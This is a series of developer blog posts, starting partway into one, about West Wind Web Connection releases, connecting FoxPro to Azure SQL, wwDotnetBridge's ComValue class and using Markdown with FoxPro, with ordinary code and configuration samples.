Note I'm using Visual Studio Code for my editing in this example, but you can really use any editor, including the FoxPro editor, for FoxPro code.

The combination of BrowserSync and Live Reload for the server can automate the entire run/debug/edit/restart cycle and reduce it down to basically just using your editor to make a change and save.

I'm really excited about this especially in combination with Launch.prg because it's now trivial to switch into BrowserSync mode.

For more detail check out the documentation and this blog post.

wwHttp Improvements

wwHttp now has support for downloading string results that are greater than 16 megs. As you know FoxPro has a 16 meg string size limit, but there are some ways around that limit if you are careful what you do with your strings. Well, wwHttp now is careful, and you can return larger strings. Now you have to be careful what you do with the returned string.

Note that if you are expecting to receive something that large, you should probably stream that data directly into a file and not into a string - a feature that's always been available in HttpGet() and is now also in all the new verb related functions (Get(), Post(), Put(), Delete()).

If you are downloading, you'll also be happy to find that you can now adjust the buffer size used for each download frame, which determines how much data is grabbed at a time for the file download. Previously the buffer was capped at 24k, which is pretty small when you're downloading a 16 meg file. You can now use the nHttpWorkBuffersize property to set a larger buffer; the default has been bumped up to 64k, which makes large file downloads go much faster. The default buffer size is also automatically adjusted to the size of the output - the value provided is a maximum, so if the content is small the buffer is sized down to match, which reduces memory overhead as well. For large downloads you might want to bump the buffer up to 128k or even 256k to really make it go fast.
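
Here's a sketch of both features together. The output file parameter position on HttpGet() is an assumption for illustration, so verify against the wwHttp documentation:

loHttp = CREATEOBJECT("wwHttp")

*** Bump the download work buffer to 128k for large files
loHttp.nHttpWorkBuffersize = 131072

*** Stream the response directly to a file instead of a string
loHttp.HttpGet("https://example.com/downloads/bigfile.zip","","","c:\temp\bigfile.zip")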

A few Odds and Ends

There's a new option on the Markdown parser that optionally disables HTML support when parsing Markdown. This means that HTML inside of the Markdown is treated as plain text rather than evaluated as HTML (which is valid Markdown). On many sites you don't want to allow users to input HTML, but you might still want to take advantage of Markdown otherwise, and this option makes that possible.

The WebLog sample has been updated with a number of tweaks. In 7.0 the sample was switched to the MVC framework from the previous Web Control Framework, so it's now more in line with the general recommendations for Web Connection development. Additionally the comment system has been rewritten, and there are now options to remove comments directly in the message list.

Summary

There are a number of additional small fixes and performance improvements in this release too insignificant to enumerate here. This release has no breaking changes but as always you should update all your application dlls to the latest versions in your project folder and in the Web Site's bin folder.

Other than that this release should be a quick and painless update.

this post created and published with Markdown Monster

Web Connection 7.06 Release Notes


Time for another Web Connection update, this time for version 7.06. This is above all a maintenance release that fixes a few small bugs that made it into the original 7.05 release - those bugs were fixed immediately and the release updated at the time, but this makes sure there's a consistent release that includes all of those bug fixes plus a few additional ones.

In addition there are a couple of major enhancements:

  • New and Improved Live Reload Functionality
  • Updated Launcher with Launch.prg

You can download the latest version from:

New Live Reload Functionality

Live Reload is a productivity feature for development that can automatically refresh your browser and restart your FoxPro server (if needed) when you change code or markup logic in your application at development time.

What is Live Reload?

Live Reload watches files in your code and Web folders and, when it finds changes, can automatically refresh the current page in the browser. On the server, Web Connection can automatically restart the Web Connection server, so you can make a change at any time and immediately see that change reflected in the browser without having to explicitly shut down and restart your server and refresh the browser. It's a huge productivity enhancer, plus it allows for much better visualization of the code - especially UI code - that you are working on.

Here's what this feature looks like in action:

It's not 100% clear in the video, but all I'm doing is changing code and markup. I'm not stopping the Web Connection server or refreshing the browser manually - the refreshes and restarts happen completely automatically.

Live Reload and Web Connection

Live Reload functionality was introduced in Web Connection 7.05 with the help of a third party tool called Browser Sync to provide the browser refresh functionality. In version 7.06 we've pulled the core functionality directly into Web Connection so you no longer need to use BrowserSync - the Live Reload functionality now lives natively in the Web Connection .NET Module via built-in WebSocket support. The new implementation is much faster since the changes are detected directly at the source and refreshed without any delay.

Inside of the .NET Module, Web Connection injects a bit of script code into any HTML content rendered - both for script mapped pages handled by Web Connection and for static HTML pages - that lets the server communicate with the browser to force a page refresh.

Enabling Live Reload in 7.06+

Live Reload is disabled by default, because it adds some request overhead and requires that ALL requests, including static files, are routed through the Web Connection module. This is totally fine during development, but the functionality isn't useful at runtime and you wouldn't want that behavior there.

So this feature needs to be explicitly activated.

In web.config:

  • Set LiveReloadEnabled configuration to True
  • Enable runAllManagedModulesForAllRequests
  • Uncomment Web Connection Live Reload Module hookup

In yourApp.ini:

  • Set LiveReloadEnabled to On

You can find out more detail on how to enable Live Reload in the documentation.
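
Roughly, those settings look like the following - a sketch only, as the exact section the key lives in inside web.config can vary by project and version:

<!-- web.config - in the Web Connection configuration section -->
<add key="LiveReloadEnabled" value="True" />

; yourApp.ini - in your server's configuration section
LiveReloadEnabled=On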

Support for Old Projects

The necessary server reload logic gets embedded in new projects via the New Project Wizard. This code can easily be adapted however and added to existing projects.

For more information how to add the server recycling code into your existing main program files of older applications, please check out the details in the Help Topic.

Update your WebConnectionModule.dll

The new Live Reload features are built into the Web Connection .NET Handler (Web\Bin\WebConnectionModule.dll), and you will need to update that file in your Web projects for Live Reload to work. Make sure your Web Connection Module Administration page shows version 7.06 or later.

You will also need to add Microsoft.WebSockets.dll which provides the Web Socket functionality used for the in-browser communication.

Finally, Live Reload requires WebSocket support, which is available only on Windows 8.1 and 10, and on Server 2012 R2 and later.

Updated Launch.prg

In version 7.05 Web Connection also introduced a new launcher for new projects. Launch.prg can be used as a wrapper around your main program to launch your application, start the Web Server (in the case of IIS Express), open a browser window, and also handle configuration of your startup environment.

The reason we added this was to automate some of the manual steps you have to go through to launch a Web Connection project for the first time to make it easier for new users to get started. In addition to launching, the launcher also prints some status information of what it's running to the Desktop to make it clearer to new users what actually is going on (you can see that text behind the main window in the video).

Today, when you create a new project, Web Connection generates a custom Launch.prg for the project and then starts it automatically with DO Launch for the Web server you chose.

To use this feature you can simply do:

*** Default Launch for Server type Generated
DO LAUNCH

*** Launch IIS Express explicitly
Launch("IISEXPRESS")

*** Launch IIS explicitly
Launch("IIS")

*** Launch without starting the server and no browser opened
Launch("SERVER")

The first options are self-explanatory. The last one is similar to doing DO YourAppMain.prg, but it also fires the environment setup code that changes the current directory, sets paths to the Web Connection libraries, etc.

Make it Yours

Launch.prg is a 'script' - it's generated with a new project specifically for that project, which means you can make changes to it. If your environment requires additional settings - drive mappings, extra paths, making sure that other EXEs are running, etc. - you can add that to your copy of Launch.prg.

Creating Launch.prg for an Old Project

By default Launch.prg is generated for new projects. But if you have an existing project you can easily create a new Launch.prg file by copying one from a new or existing project. All the configuration settings that change are defined at the top of the file so you can just change the relevant settings.

For example the following are for the TestProject I used in the Video above:

*** Generated Defaults
lcVirtual = "TestProject"
lcAppName = "Testproject"
lcScriptMap = "tp"
lcWcPath = ADDBS("C:\WCONNECT\FOX\")
lcWebPath = LOWER(FULLPATH("..\web"))
lcIisDomain = "localhost"     && test.west-wind.com
llIisExpress = .F.

Version 7.06 Summary

There you have it: Web Connection 7.06 is a relatively small update. The main reason we pushed this out so quickly after 7.05 is to get the Live Reload and Launch features out before the features introduced in 7.05 make it into too many setups. Although this version makes a change to those older settings, the changes are very minor. It's better to do it now while those changes are fresh in everybody's mind.

Resources

Using FoxPro to Connect to an Azure SQL Database


Several times now people have asked me whether you can use FoxPro's SQL Server features, and the wwSQL class in particular to connect to a remote Azure SQL database. The answer is a hearty yes, of course.

But there are a few things you have to consider when using Azure in general and connecting to an Azure SQL database remotely.

Azure Databases

Azure SQL databases are basically SQL Server databases. Azure SQL is 95+% compatible with SQL Server and you use the same SQL Server drivers that you use to connect to a local or locally networked SQL Server database.

In order to access an Azure SQL database remotely you have to configure a couple of things:

  • Enable the Firewall for your IP Address
  • Pick up a valid Connection String

In the portal you can find those two options here:

Picking up a Connection String

Connecting to a SQL Azure database is the same as any other database - you use a connection string to connect to it. If you're using raw FoxPro you can use SQLSTRINGCONNECT(), or if you're using the wwSQL class you can use the Connect() method with the connection string as a parameter.

There are several connection string formats available, and the best match for FoxPro is the ODBC one:

You need to take the username and password that are set up for the database and embed those into the connection string provided.

The username is typically the name of the database. The password can only be looked up by resetting it in the portal - for security reasons Azure never echoes the password back to you other than when it's created. This is a pain, but it's good security practice.

Retrieving or Resetting the Password

To reset the password:

  • Click on the Server Name (mydb.database.windows.net)
  • Then click on Reset Password

Basically this is the equivalent of resetting the admin password on the server and the only way that password can be redisplayed on the portal is by resetting it.

Once you've reset the password it's displayed and you can save it and use it in your connection string. I recommend you save it somewhere, or if you have an Azure Web application that uses it, immediately apply it to that application's configuration values.

Allowing IP Address Access

The connection string alone is not enough and you need to enable access for the specific IP Address that you're using to access the database.

Because Azure is a remote database, there are serious security concerns over who can access the database, so Azure SQL (and most other data services on Azure) requires you to provide a white list of IP addresses:

You have to explicitly enable access for all IP addresses that need to access the server.

You can do this in the portal by specifying any number of IP addresses here:

As you can see you can specify a begin and end IP Address which is a range and each user or server requires a configuration (if they are not in the same location). For example, in this database Markus Egger and I work on this application and we both have multiple locations we're accessing the application from.

Note that Azure server locations - relevant if you are using an Azure Web application to connect - are automatically included, so you don't have to explicitly enable those.

For a single IP use the same IP for both the start and end addresses. I tend to use the full range of the subnet, just because an ISP will often change your IP address when your address' lease expires.

If you forget to set up IP address access, the server won't respond to the remote IP address, and a connection attempt will typically hang for the duration of the connection timeout.

SQL Server ODBC Driver

You also need to make sure that the machine you're using has a SQL Server ODBC driver installed. The ODBC connection string provided by Azure will automatically include a very specific ODBC driver, along with a link where you can download it.

Personally I prefer to leave off the driver and use whatever is installed locally which is the default FoxPro SQL driver. You may need a newer explicit driver if you use some of the newer SQL Server data types and features, but for most applications the old drivers are just fine.

Connecting

Once you have a connection string, an ODBC driver and the IP address configured, you're finally ready to connect.

Pick up the ODBC connection string from the Azure portal and then add in your username and password. Remember by default the username is the name of the database, and password is the server's admin password.

Here's what this looks like using wwSQL:

CLEAR
lcConn = "Server=tcp:mydb.database.windows.net,1433;" + ;
         "Database=kavadocs;" + ;
         "uid=mydb;pwd=ultraSeekritPassword;" + ;
         "MultipleActiveResultSets=yes;Encrypt=yes;" + ;
         "Connection Timeout=30"
DO wwSQL
loSql = CREATEOBJECT("wwSql")
? loSql.Connect(lcConn)
? loSql.cErrorMsg

? loSql.Execute("select * from Users")
? loSql.cErrorMsg
BROWSE NOWAIT

And that lets me access the remote database. Note I removed the specific driver from the connection string. You can leave that in, just remember that if you do, that driver has to be installed everywhere you run the application, whereas the code above will work with whatever driver is installed. Some SQL Server ODBC driver has to be installed in order for this to work, so your application's installer probably needs to ensure it installs an appropriate ODBC driver.

The code above uses wwSQL - for plain FoxPro, replace the .Connect() call with SQLSTRINGCONNECT() and then capture the connection handle to run your SQLEXEC() commands.
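
For reference, here's a minimal sketch of the same thing in plain FoxPro without wwSQL:

LOCAL lnHandle
lnHandle = SQLSTRINGCONNECT(lcConn)
IF lnHandle < 1
   ? "Connection failed"
   RETURN
ENDIF

*** Run queries against the connection handle
IF SQLEXEC(lnHandle,"select * from Users","TQuery") > 0
   BROWSE NOWAIT
ENDIF

SQLDISCONNECT(lnHandle)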

Summary

Azure is getting popular for hosting data stores, and SQL Azure is an easy way to host a SQL Server that is compatible with traditional SQL Server applications in the cloud. Azure isn't cheap especially if you need higher performance or lots of storage, but it does provide a nice admin-less service in the cloud that's easy to set up and manage remotely with very little effort.

Remote connections are not something you should use as part of a production application - performance generally is not great over the Internet - but in a bind it's totally possible to connect and access the database remotely. The most common scenario is development and testing, while the deployed Web application actually runs on Azure proper.

I hope this brief post gives you all the information you need to use Azure SQL databases in your FoxPro applications remotely.

this post created and published with Markdown Monster

West Wind Web Connection 7.08 Release Notes


Web Connection 7.08 is out, and this release, like the last one, is mostly a maintenance release that fixes a few small bugs and provides some minor behind the scenes tweaks to existing functionality.

The theme of recent releases has been a focus on the development time experience, and the changes in this update continue along those lines with additional improvements to the new Launch.prg and the Live Reload functionality.

Live Reload Enhancements

If you missed it, starting in v7.05 Web Connection provides support for live reloading of content when you make a change to client side HTML/CSS/JS, a server side template or script, or even your process class code. Live Reload, when enabled, detects that a file of interest was changed and then automatically refreshes the current page in the active Web browser. This technology works through the magic of WebSockets, which allow the Web Connection server module to communicate with script code running inside of the browser to refresh the page.

Live Reload is an immense time saver: as you work on your code, every change updates the live browser with rendered output. If you run the browser side by side with your editor or IDE, or on another monitor, you can immediately see these changes reflected in real time on the page your browser is currently on. Any change triggers an update to the browser.

If you've never used this way of working before, especially for your HTML/CSS and template code, it's hard to describe how much of a productivity boost this provides.

To give you an idea how this works here is a short screen capture that highlights the features:

As mentioned, Live Reload was initially added in 7.05 with a third party requirement for the NPM BrowserSync tool. In 7.06 Web Connection switched to an internal implementation directly inside of WebConnectionModule.dll, so the third party dependency was removed.

In Web Connection 7.08 we've made it even easier to configure Live Reload - which has to be enabled explicitly in order to work - by reducing the steps to 3 small configuration changes. You can find out more about configuring Live Reload, as well as some additional detail on features, in the Online Documentation topic.

Upgrading Live Reload from a previous Version

The configuration for Live Reload has changed how static HTML files are intercepted. There's a new HTML mapping that can be enabled along with Live Reload to handle Live Reload for static HTML files. This removes the need to add a custom module and use runManagedModulesForAllRequests to force all requests through the ASP.NET runtime, which improves performance and simplifies configuration somewhat.

If you are upgrading from 7.06/.05:

  • Remove the <modules> configuration from web.config
  • Map *.htm* in the <handlers> section to the Web Connection handler (see the sketch below)

Detailed configuration info is available in the documentation.
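As a rough sketch, the web.config change might look something like this - the handler name and type string here are assumptions, so check the documentation topic for the authoritative settings:

<handlers>
  <!-- map static .htm/.html files to the Web Connection handler
       (name and type string are assumptions - see the docs for exact values) -->
  <add name="wcLiveReloadHtml" path="*.htm*" verb="*"
       type="Westwind.WebConnection.WebConnectionHandler,WebConnectionModule" />
</handlers>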

Visual Studio Addin updated for Visual Studio 2019

Microsoft continues to muck with the Visual Studio addin APIs and it's been necessary to update the addin hookups and configuration to work with recent versions of Visual Studio 2019. The most recent requirements resulted in the Web Connection addin triggering a yellow warning bar during Visual Studio startup.

Starting with Web Connection 7.08, the addin implements async loading - the lack of which was the cause of the warning message. Async loading defers loading addins until they are actually invoked from a menu option, which helps improve Visual Studio startup times.

JSON Sizing

Web Connection has support for generating JSON output using standard FoxPro code, which is fairly efficient. In the past however there have been size limitations to the JSON output. While I don't recommend creating massive JSON documents that approach the FoxPro 16 meg string limit, that's now actually supported.

JSON size is ultimately limited by the FoxPro 16 meg string limit, but previously the JSON string parser used an overly pessimistic pre-sized buffer to hold the JSON text passed to internal APIs, which cut off output well below that limit.

In v7.08 we changed the logic to max out the buffer size at FoxPro's maximum string size and to handle errors more gracefully if the buffer is overrun. This allows JSON string parsing up to the FoxPro 16 meg limit now, whereas before it was limited by the pessimistic pre-sized buffer.

Note that large JSON documents even approaching 16 megs are going to be very, very slow to parse, even with efficient parsers in other languages like .NET. JSON is a great format for data transfer, but it's not so good with very large documents, as the tree parsing requires excessive memory. For this reason I would highly recommend you make sure you are not creating very large JSON files. If you really need to transfer that much data, it's often better to use XML (yes, XML parsing is actually faster for large documents) or packed Zip files of actual data files (using EncodeDbf perhaps). But better still is to break up huge data files into smaller, more atomic chunks that can be put back together when received.
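Here's a minimal sketch of that chunking idea, using the wwJsonSerializer class that ships with Web Connection. The cursor name, chunk size and file naming are arbitrary placeholders:

*** Sketch: write a large cursor out as a series of JSON chunk files
DO wwJsonSerializer
loSer = CREATEOBJECT("wwJsonSerializer")

SET SAFETY OFF
lcTemp = ADDBS(SYS(2023)) + "json_chunk.dbf"
lnChunk = 0

SELECT MyBigCursor
GO TOP
DO WHILE !EOF()
   lnChunk = lnChunk + 1

   *** Copy the next 10,000 rows into a work table
   COPY NEXT 10000 TO (lcTemp)
   USE (lcTemp) IN 0 ALIAS ChunkCursor

   *** wwJsonSerializer serializes a cursor via the cursor: prefix
   lcJson = loSer.Serialize("cursor:ChunkCursor")
   STRTOFILE(lcJson, "data_chunk_" + TRANSFORM(lnChunk) + ".json")
   USE IN ChunkCursor

   SELECT MyBigCursor
   IF !EOF()
      SKIP   && move past the last copied record
   ENDIF
ENDDO

The receiver can then deserialize each chunk separately and append the results, keeping each individual parse well below the problematic size range.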

Upgrading

In order to upgrade existing production applications you'll want to:

  • Delete all FXP files in the project directories
  • Recompile all PRG and VCX files (see the sketch after this list)
  • Update DLLs in production apps
  • Update the Web specific files (DLLs, scripts, CSS)

There's lots of good update information in the Updating from previous Versions topic in the documentation.
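For the delete and recompile steps, something along these lines works from the FoxPro command window - a sketch only, with the project path as a placeholder:

*** Sketch: clear stale FXPs and recompile (adjust the path to your project)
SET SAFETY OFF
CD c:\wconnect\myapp
DELETE FILE *.fxp
COMPILE *.prg
COMPILE CLASSLIB *.vcx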

Summary

As promised, v7.08 is a very small update and the primary reason for it was to fix a few small bugs. The Live Reload and VS Addin enhancements are a side effect bonus.

Web Connection is a mature product, so changes come less frequently now - most deal with improvements to the development process and updates to the client side libraries - and this small incremental update pace of every few months is likely to continue.

The good news is that these small incremental upgrades mean minimal work for you to get up to a new version. Happy upgrading…

this post was created and published with Markdown Monster

wwDotnetBridge: Getting and Setting COM Unsupported Values with ComValue


wwDotnetBridge lets your FoxPro applications easily access .NET code from FoxPro, without having to register .NET Components as COM objects and with the ability to access any .NET type and type members including types that are not directly supported over COM.

wwDotnetBridge still uses COM, but unlike standard COM Interop with .NET you don't have to instantiate objects via COM; instead wwDotnetBridge hosts the .NET Runtime and provides activation services for object instances. This means any object and any type becomes accessible, while plain COM interop is very limited in what can be accessed and which types are supported.

ComValue and Types that don't work over COM

One of the reasons you want to use wwDotnetBridge rather than raw COM interop is that you get access to types that are not supported via COM. For example, COM has no support for a number of .NET Types and type formats.

Examples of unsupported types include:

  • Long, Single, Decimal number types
  • Guid, Byte, DbNull, char
  • any Value type
  • Enum Values
  • Any Generic Value or Type

That's a pretty wide swath of types that are inaccessible via COM, but with the help of the ComValue class it's possible to access these types even though you can't access them natively in FoxPro.

ComValue is a facade that provides a wrapper around a .NET Value. It masquerades as a stand-in for the .NET Value and makes it accessible to FoxPro via helper methods that can set and retrieve the .NET value as something that FoxPro can deal with.

How it works

ComValue works by creating a .NET wrapper object with a Value property that holds the actual .NET value, plus methods that allow setting and retrieving that value - or a translation thereof - in FoxPro. The Value is stored in .NET and is never passed directly to FoxPro, because effectively it's not accessible there. Instead you pass or receive a ComValue instance that contains the Value and has conversion routines that allow access to the Value from FoxPro, both for setting and getting values.

The idea is simple: The actual raw Value never leaves .NET and the value is always indirectly accessed via conversions that let you set and retrieve the Value as something that works in FoxPro. So DbNull is turned into a null, or a Guid into a string and vice versa for example.

Automatic ComValues

One of the nice - but also often confusing - features of wwDotnetBridge is that it will automatically return ComValue instances for most types that otherwise are incompatible. So when you use wwDotnetBridge's intrinsic helper functions and you pass in or receive back say a .NET Guid it'll automatically convert that Guid into a ComValue that is returned instead.

ComValue results are automatically returned with:

  • GetProperty()
  • InvokeMethod() result values

For example:

loGuid = loBridge.InvokeMethod(loObj,"GetGuid") 
* Get Guid from ComValue
lcGuid = loGuid.GetGuid()

You can pass ComValue objects when using these methods:

  • SetProperty()
  • InvokeMethod() parameters
  • CreateInstance() constructor parameters
  • ComArray.AddItem()

For these methods you create a ComValue instance and set the Value and then pass that to one of the above methods.

lcGuid = GetAGuidStringFromSomewhere()
loGuid = loBridge.CreateComValue()
loGuid.SetGuid(lcGuid)

llResult = loBridge.InvokeMethod(loObj,"SetGuid",loGuid)

It's important to understand that it's wwDotnetBridge that understands ComValue instances, not .NET, so you can only pass or receive a ComValue through the indirect access methods above - never to a .NET method via direct COM access.

Simple type conversion:

Here's an example of passing a byte/int16 value - which natively is not supported - back and forth between FoxPro and .NET:

*** Create .NET Object instance
loNet = loBridge.CreateInstance("MyApp.MyNetObject")

*** Convert the 'unsupported' parameter type
LOCAL loVal as Westwind.WebConnection.ComValue
loVal = loBridge.CreateComValue()
loVal.SetInt16(11)

*** Call method that takes Int16 parameter
loBridge.InvokeMethod(loNet,"PassInt16",loVal)

ComValue caching for Method and Property Invocation

ComValue also supports setting a ComValue from properties and method results. This is useful if you have a method or property that uses a type inaccessible via COM (like strongly typed or subclassed dataset objects for example). In this case you can call the SetValueXXX methods to fill the ComValue structure and then use this ComValue in InvokeMethod, SetProperty calls which automatically pick up this ComValue object's underlying .NET type.

*** Create an array of parameters (ComArray instance)
loParms = loBridge.CreateArray("System.Object")
loParms.AddItem("Username")
loParms.AddItem("Password")
loParms.AddItem("Error Message")

*** Create a ComValue structure to hold the result: a DataSet
LOCAL loValue as Westwind.WebConnection.ComValue
loValue = loBridge.CreateComValue()

*** Invoke the method and store the result on the ComValue structure
*** Result from this method is DataSet which can't be marshalled properly over COM
? loValue.SetValueFromInvokeMethod(loService,"Login",loParms)

*** This is your raw DataSet
*? loValue.Value   && direct access won't work  because it won't marshal

*** Now call a method that requires the DataSet parameter
loBridge.InvokeMethod(loService,"AcceptDataSet",loValue)

The gist of this is that the DataSet result is never passed through FoxPro code, but is stored in the ComValue, and then that ComValue is used as a parameter in the InvokeMethod call. All indirect execution methods (InvokeMethod, SetProperty etc.) understand ComValue and use its Value property for the parameter provided.

Caveats with ComValue

The biggest caveat with ComValue is that it's not obvious that some of wwDotnetBridge's methods automatically return ComValue instances or expect ComValue instances to be passed in. If you are calling a .NET method that expects a long value you'll likely end up passing an integer and wondering why that fails. It fails because it's an unsupported type, but that's not obvious or easily discoverable, and the error message that .NET throws unfortunately isn't conducive to resolving the problem either.
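For example, if a .NET method takes a long (Int64), wrapping the value in a ComValue via SetLong() avoids the signature mismatch. PassLong here is a hypothetical method name:

*** Sketch: pass an Int64 value that doesn't fit a FoxPro integer
loVal = loBridge.CreateComValue()
loVal.SetLong(4500000000)

*** PassLong is a hypothetical .NET method with an Int64 parameter
loBridge.InvokeMethod(loNet, "PassLong", loVal)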

Just realize that if you call methods that use special types (see the list above) and you get messages like Invalid Method Signature, Method not Found or Property 'x' is not found on object Y, you should examine the .NET signature and make sure the expected value isn't one of the problem children.

So discoverability is not there, but beyond raising awareness with this blog post and the topic in the documentation there's not much I can do unfortunately. I hope this post helps and adds another point of discoverability for this topic.

Summary

ComValue is a powerful helper class that enables scenarios that otherwise would not be accessible to FoxPro.


this post was created and published with Markdown Monster


Marking up the World with Markdown and FoxPro


prepared for: Southwest Fox 2018
October 1st, 2018

Markdown has easily been one of the most influential technologies to affect me in the last few years. Specifically, it has changed how I work with documentation and a variety of documents, both for writing and for text editing and content storage inside of applications.

Markdown is, typically, a plain text representation of HTML. Markdown works using a relatively small set of easy to type markup mnemonics that represent many common document centric HTML elements like bold, italic and underlined text, ordered and unordered lists, links and images, code snippets, tables and more. This small set of markup directives is easy to learn and quick to type in any editor without special tools or applications.

In the past I've been firmly planted in the world of rich text editors like Word, using a WYSIWYG editor on the Web, or - for blog editing - using something like Live Writer, which used a WYSIWYG editor for post editing. When I first discovered Markdown a number of years ago, I very quickly realized that rich editors, while they look nice as I type, are mostly a distraction and often end up drastically slowing down my typing. When I write, the most important thing to me is getting my content onto the screen/page as quickly as possible, and having a minimal way to do this is more important than seeing the layout transformed as I type. Typing plain text is oddly freeing, and with most Markdown editors it's also much quicker than using a rich editor. I found that Markdown helped me in a number of ways to improve my writing productivity.

Pretty quickly I found myself wishing most or all of my document interaction could be via Markdown. Even today I often find myself typing Markdown into email messages, comments on message boards and even into Word documents where it obviously doesn't work.

For me Markdown was highly addictive. I wanted Markdown in all the places!

Today I write most of my documentation for products and components using Markdown. I write my blog posts using Markdown. The West Wind Message Board uses Markdown for messages that users can post. I enter product information in my online store using - you guessed it - Markdown. This document you're reading now, was written in Markdown as well.

I work on three different documentation tools and they all use Markdown - one with data stored in FoxPro tables, the others with Markdown documents on disk. Heck, I even wrote a popular Markdown editor called Markdown Monster to provide an optimized editing experience - and it turns out I'm not alone in wanting that. Because Markdown is a non-proprietary format, it's easy to build cool support features myself: since it's just text, enhancing a document is as simple as injecting text into a text document.

What is Markdown?

I gave a brief paragraph summary of Markdown above. Let me back this up with a more thorough discussion of what Markdown is. Let's start with a quick look at what Markdown looks like as you'd type it into a Markdown editor that provides syntax highlighting:
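A small sample - the link and image paths are just placeholders:

# A Header

This text is **bold** and *italic*, with a [link](https://west-wind.com)
and an image: ![logo](images/logo.png)

* List Item 1
* List Item 2

> A block quote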

There are of course many more features to Markdown, but this gives you an idea what Markdown content looks like. You can see that the Markdown contains a number of simple formatting directives, yet the document you are typing is basically text and relatively clean. Even so, you are looking at the raw Markdown, which includes all of the formatting information.

And this is one of the big benefits of Markdown: You're working with text using the raw text markup format while at the same time working in a relatively clean document that's easy to type, edit and read. In a nutshell: There's no magic hidden from you with Markdown!

Let's drill into what Markdown is and some of the high-level benefits it offers:

HTML Output Based

Markdown is a plain text format that typically is rendered into HTML. HTML is the most common output target for Markdown. In fact, Markdown is a superset of HTML and you can put raw HTML inside of a Markdown document.

However, there are also Markdown parsers that can directly create PDF documents, ePub books, revealJS slides and even WPF Flow Layout documents. How Markdown is parsed and used is really up to the parser that turns Markdown into something that is displayed to the user. Just know that the default assumption is that the output is HTML. For the purpose of this document we only discuss Markdown as an HTML output renderer.

Although Markdown is effectively a superset of HTML - it supports raw HTML as part of a document - Markdown is not a replacement for HTML content editing in general. Markdown does great with large blocks of text based content such as documentation, reference material, or informational Web site content like About pages, Privacy Policies and the like that are mostly text. Markdown's markup can represent many common writing abstractions like bold text, lists, links, images etc., but the markup itself - outside of raw HTML - doesn't have layout support. IOW, you can't easily add custom styling, additional HTML <div> elements and so on. Markdown is all about text and the few most-used features appropriate for text editing.

Plain Text

One of the greatest features of Markdown is that it's simply plain text. This means you don't need a special editor to edit it. Notepad or even an Editbox in FoxPro or a <textarea> in a Web application is all you need to edit Markdown. It works anywhere!

If you need to edit content and want to create HTML output, Markdown is an easy way to create that HTML by editing its plain text representation. Markdown is text centric, so it's meant primarily for text based documents.

Markdown offers a great way to edit content that needs to display as HTML. But rather than editing HTML tag soup directly, Markdown lets you write mostly plain text with only a few easy to remember markup text "symbols" that signify things like bold and italic text, links, images, headers, lists and so on. The beauty of Markdown is that it's very readable and editable as plain text, and yet can still render nice looking HTML content. For editing scenarios it's easy to add a previewer so you can see what you're typing without it getting in the way of your text content.

Markdown makes it easy to represent text centric HTML output as easily typeable, plain text.

Simplicity

Markdown is very easy to get started with, and after learning less than a handful of common Markdown markup commands you can be highly productive. Most of the markup directives feel natural because a number of them have already been in use in old school typesetting solutions for Unix/DOS etc. For the most part content creation is typing plain text with a handful of common markup commands - bold, italic, lists, images and links are the most common - mixed in.

Raw Document Editing

With Markdown you're always editing the raw document. The big benefit is you always see what the markup looks like, because you are editing the raw document, not some rendered version of it. This means if you use a dedicated Markdown editor that embeds tags for you, you can see the raw tags as they are embedded. This makes it easy to learn Markdown, because even if you use editor tooling you immediately see what that tooling does. Once you get familiar, many Markdown 'directives' are quicker to simply type inline than to apply via hotkeys or toolbar selections.

Productivity

Markdown brings big productivity gains due to the simplicity of typing plain text and not having to worry about formatting while writing. To me (and many others) this can't be overstated. I write a lot of large documents and this is a minimalist approach, but to me it greatly frees my mind from unneeded clutter to focus on the content I'm trying to create.

Edit with any Editor or Textbox

Because Markdown is text, you don't need a special tool to edit it - any text editor, even Notepad, will do; or if you're using it in an application, a simple textbox does the trick in desktop apps or Web apps. It's also easy to enhance this simple interface with convenience features, and because it's just plain text it's also very easy to build custom tooling that can embed complex text features like special markup, equations or publishing directives directly into the document. This is why there is a lot of Markdown related tooling available.

Easy to Compare and Share

Because Markdown is text it can be easily compared using source control tools like Git. Markdown text is mostly content, unlike HTML, so source code comparisons aren't burdened by things like HTML tags or - worse - binary files like Word documents.

Fast Editing

Editing Markdown text tends to be very fast, because you are essentially editing plain text. Editors can be bare bones and don't need to worry about laying out text as you type, which would slow down your typing speed. As a result Markdown editors tend to feel fast and efficient without keyboard lag. Most WYSIWYG solutions are dreadfully slow for typing (the big exception being Word, because it uses non-standard keyboard input trapping).

Developer Friendly

If you're writing developer documentation, one important aspect is adding syntax colored code snippets. If you've used Word or a tool that uses a WYSIWYG HTML editor, you know what a pain it can be to get properly color coded code into a document.

Markdown has native support for code blocks as part of Markdown syntax which allows you to simply paste code into the document as text and let the Markdown rendering handle how to display the syntax. The generated output for code snippets uses a commonly accepted tag format:

<pre><code class="language-html">
lcId = SYS(2015)</code></pre>

There are a number of JavaScript libraries that understand this format and can easily turn this HTML markup into syntax highlighted code. I use highlightJS - more on that later.

Markdown Transformation

Markdown is a markup format, which means it is meant to take Markdown text and turn it into something else. Most commonly that something else is HTML, which can then be used for other things like PDF, Word or ePub document creation using additional and widely available tools.

Markdown has many uses and it can be applied to a number of different problem domains:

  • General document editing
  • Documentation
  • Rich text input and storage in applications
  • Specialized tools like note editing or todo lists etc.

If you're working in software and you're doing anything with open source, you've likely run into Markdown files and the ubiquitous readme.md files that are used for base documentation of products. Beyond that most big companies are now using Markdown as their primary documentation writing format.

What problem does Markdown Solve?

At this point you may be asking yourself: I've been writing for years in Word - what's wrong with that? Or: I use a WYSIWYG HTML editor in my Web application for rich text input, so what does Markdown provide that these solutions don't?

There are several main scenarios that Markdown (and also other markup languages) addresses that make it very useful.

Text Based

First, Markdown is text based, which means you don't need special tooling to edit a Markdown file. You don't need Word or some HTML based editor to edit Markdown. You can use Notepad or a plain HTML textbox to write and edit Markdown text, and because the Markdown features are very simple text 'markup directives', even a plain textbox lets you get most of the job done.

You can also use specialized editors - most code editors like Visual Studio Code, Notepad++ or Sublime Text have built in support for Markdown syntax coloring and some basic expansion. Or you can use a dedicated Markdown editor like my own Markdown Monster.

Using Markdown in FoxPro

In order to use Markdown in any environment you need a Markdown parser that can convert Markdown into HTML. Once it's in HTML you need to use the HTML in a manner that is useful. For Web applications that's usually as easy as embedding the HTML into a document, but there are a number of different variations.

In desktop applications you often need a WebBrowser control or external preview to see the Markdown rendered in a useful way.

Markdown Parsing for FoxPro

